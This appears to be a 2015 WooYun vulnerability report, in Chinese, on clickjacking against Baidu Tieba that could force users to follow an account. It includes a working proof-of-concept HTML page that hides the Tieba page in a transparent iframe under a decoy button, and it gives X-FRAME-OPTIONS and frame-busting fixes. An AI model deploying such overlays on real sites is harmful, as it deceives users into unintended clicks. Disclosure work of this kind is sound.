漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-098802
漏洞标题:百度贴吧点击劫持(可恶意刷粉丝)
相关厂商:百度
漏洞作者: marshal
提交时间:2015-03-02 11:52
修复时间:2015-04-16 11:54
公开时间:2015-04-16 11:54
漏洞类型:设计缺陷/逻辑错误
危害等级:高
自评Rank:15
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-03-02: 细节已通知厂商并且等待厂商处理中
2015-03-02: 厂商已经确认,细节仅向厂商公开
2015-03-12: 细节向核心白帽子及相关领域专家公开
2015-03-22: 细节向普通白帽子公开
2015-04-01: 细节向实习白帽子公开
2015-04-16: 细节向公众公开
简要描述:
百度贴吧没考虑点击劫持防御,可造成恶意刷粉丝。
估计很多地方都没考虑,还可以继续挖。
详细说明:
点击劫持(ClickJacking)是由互联网安全专家罗伯特.汉森和耶利米.格劳斯在2008年首创的。是一种视觉欺骗手段,在Web端就是Iframe嵌套一个透明不可见的页面,让用户在不知情的情况下,点击攻击者想要欺骗用户点击的位置。
百度贴吧页面没考虑该漏洞,可以导致恶意刷粉丝。
想象一下,我在某个大号下留个劲爆消息,诱导用户到我的域名点击按钮,最后大家都成我贴吧的粉丝了。
漏洞证明:
我的本地页面代码:
<html>
<head>
<meta charset="utf-8" />
<title>demo</title>
</head>
<div style="z-index:999;opacity:0.0;width:2000px; height:2500px;overflow:hidden;position:absolute;">
<iframe id="inner" style="position:absolute;top:0px;width:1500px;height:1500px;left:0px;" src="http://tieba.baidu.com/p/3564916309"></iframe>
</div>
<button id="click" style="cursor:pointer;z-index:10px;position:absolute;top:235px;left:438px;text-align:center;width:84px;height:35px;">点我试试</button>
</html>
修复方案:
一、X-FRAME-OPTIONS
X-FRAME-OPTIONS是微软提出的一个http头,专门用来防御利用iframe嵌套的点击劫持攻击。
并且在IE8、Firefox3.6、Chrome4以上的版本均能很好的支持。
这个头有三个值:
DENY // 拒绝任何域加载
SAMEORIGIN // 允许同源域下加载
ALLOW-FROM // 可以定义允许frame加载的页面地址
php中设置示例:
header ( "X-FRAME-OPTIONS:DENY");
二、目前最好的js的防御方案为:
<head>
<style> body { display : none;} </style>
</head>
<body>
<script>
if (self == top) {
var theBody = document.getElementsByTagName('body')[0];
theBody.style.display = "block";
} else {
top.location = self.location;
}
</script>
具体原理请参考乌云知识库:http://drops.wooyun.org/papers/104
版权声明:转载请注明来源 marshal@乌云
漏洞回应
厂商回应:
危害等级:低
漏洞Rank:3
确认时间:2015-03-02 21:22
厂商回复:
感谢提交,已通知业务部门处理
最新状态:
暂无